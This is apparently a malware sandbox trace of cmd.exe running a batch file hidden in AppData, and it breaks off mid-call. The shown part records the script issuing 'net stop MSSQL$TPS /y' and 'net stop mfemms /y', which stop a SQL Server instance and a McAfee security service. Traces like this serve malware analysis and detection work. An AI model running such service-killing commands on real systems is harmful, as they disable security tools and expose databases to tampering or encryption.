MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$TPS /y\r\nΓÇ¥ /y\r\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 23 [0214.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.720] GetFileType (hFile=0x78) returned 0x1 [0214.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15a7 [0214.720] GetProcessHeap () returned 0x3e0000 [0214.720] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.720] GetProcessHeap () returned 0x3e0000 [0214.720] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.723] _tell (_FileHandle=3) returned 5543 [0214.723] _close (_FileHandle=3) returned 0 [0214.723] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.723] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.723] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.724] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.724] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.724] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.724] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.724] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.724] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.724] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.724] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.724] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.724] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.724] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.724] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.724] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.724] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.724] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.724] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.724] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.724] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.724] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.724] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.724] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.724] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.724] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.724] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.724] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.724] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.724] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.724] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.724] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.724] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.724] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.724] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.724] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.724] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.724] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.724] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.724] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.724] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.725] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.725] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.725] SetErrorMode (uMode=0x0) returned 0x1 [0214.725] GetProcessHeap () returned 0x3e0000 [0214.725] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.725] GetProcessHeap () returned 0x3e0000 [0214.725] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.725] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.725] GetProcessHeap () returned 0x3e0000 [0214.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.726] GetProcessHeap () returned 0x3e0000 [0214.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.726] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.726] GetProcessHeap () returned 0x3e0000 [0214.726] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.726] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.726] GetProcessHeap () returned 0x3e0000 [0214.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.726] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.726] GetProcessHeap () returned 0x3e0000 [0214.726] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.727] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.727] GetLastError () returned 0x2 [0214.728] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.728] GetLastError () returned 0x2 [0214.728] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.729] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.729] GetLastError () returned 0x2 [0214.730] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.730] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.730] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.731] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.731] SetErrorMode (uMode=0x0) returned 0x1 [0214.731] GetProcessHeap () returned 0x3e0000 [0214.731] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.731] GetProcessHeap () returned 0x3e0000 [0214.731] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.731] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.731] GetProcessHeap () returned 0x3e0000 [0214.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.731] GetProcessHeap () returned 0x3e0000 [0214.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.732] GetProcessHeap () returned 0x3e0000 [0214.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.732] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.732] GetProcessHeap () returned 0x3e0000 [0214.732] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.732] GetProcessHeap () returned 0x3e0000 [0214.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.733] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.733] GetLastError () returned 0x2 [0214.734] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.734] GetLastError () returned 0x2 [0214.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.735] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0214.735] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0214.735] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.735] GetLastError () returned 0x2 [0214.736] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0214.736] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0214.736] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.736] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.736] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.737] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.737] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.737] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$TPS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$TPS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5cc, dwThreadId=0xbb4)) returned 1 [0214.741] CloseHandle (hObject=0x78) returned 1 [0214.741] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.741] GetProcessHeap () returned 0x3e0000 [0214.741] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.741] GetEnvironmentStringsW () returned 0x3f8408* [0214.742] GetProcessHeap () returned 0x3e0000 [0214.742] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.742] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.742] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0214.885] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0214.885] CloseHandle (hObject=0x74) returned 1 [0214.885] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0214.885] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0214.885] GetProcessHeap () returned 0x3e0000 [0214.885] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.885] GetEnvironmentStringsW () returned 0x3f8408* [0214.885] GetProcessHeap () returned 0x3e0000 [0214.885] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.886] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.886] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.886] GetProcessHeap () returned 0x3e0000 [0214.886] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.886] GetEnvironmentStringsW () returned 0x3f8408* [0214.886] GetProcessHeap () returned 0x3e0000 [0214.886] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.886] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.886] GetProcessHeap () returned 0x3e0000 [0214.886] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.886] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.886] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.886] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.886] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.886] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.886] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.886] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.887] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.887] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.887] SetConsoleInputExeNameW () returned 0x1 [0214.887] GetConsoleOutputCP () returned 0x1b5 [0214.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0214.888] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0214.888] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.888] SetFilePointer (in: hFile=0x74, lDistanceToMove=5543, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15a7 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.888] GetProcessHeap () returned 0x3e0000 [0214.888] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.888] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.888] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15a7 [0214.888] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x31a, lpOverlapped=0x0) returned 1 [0214.888] SetFilePointer (in: hFile=0x74, lDistanceToMove=5563, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15bb [0214.889] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=20, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop mfemms /y\r\ny\r\nΓÇ¥ /y\r\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 20 [0214.889] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.889] GetFileType (hFile=0x74) returned 0x1 [0214.889] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.889] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15bb [0214.889] GetProcessHeap () returned 0x3e0000 [0214.889] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.889] GetProcessHeap () returned 0x3e0000 [0214.889] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.893] _tell (_FileHandle=3) returned 5563 [0214.893] _close (_FileHandle=3) returned 0 [0214.893] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.893] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.893] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.893] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.893] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.893] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.893] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.893] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.893] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.893] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.893] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.893] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.893] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.893] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.893] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.893] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.893] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.893] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.893] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.893] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.893] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.893] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.893] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.893] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.893] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.893] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.893] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.893] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.893] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.894] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.894] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.894] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.894] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.894] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.894] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.894] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.894] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.894] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.894] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.894] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.894] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.894] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.894] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.894] SetErrorMode (uMode=0x0) returned 0x1 [0214.894] GetProcessHeap () returned 0x3e0000 [0214.894] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.894] GetProcessHeap () returned 0x3e0000 [0214.894] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.895] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.895] GetProcessHeap () returned 0x3e0000 [0214.895] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.895] GetProcessHeap () returned 0x3e0000 [0214.895] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.895] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.895] GetProcessHeap () returned 0x3e0000 [0214.895] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.895] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.895] GetProcessHeap () returned 0x3e0000 [0214.895] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.896] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.896] GetProcessHeap () returned 0x3e0000 [0214.896] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.897] GetLastError () returned 0x2 [0214.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.897] GetLastError () returned 0x2 [0214.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.898] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.899] GetLastError () returned 0x2 [0214.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, 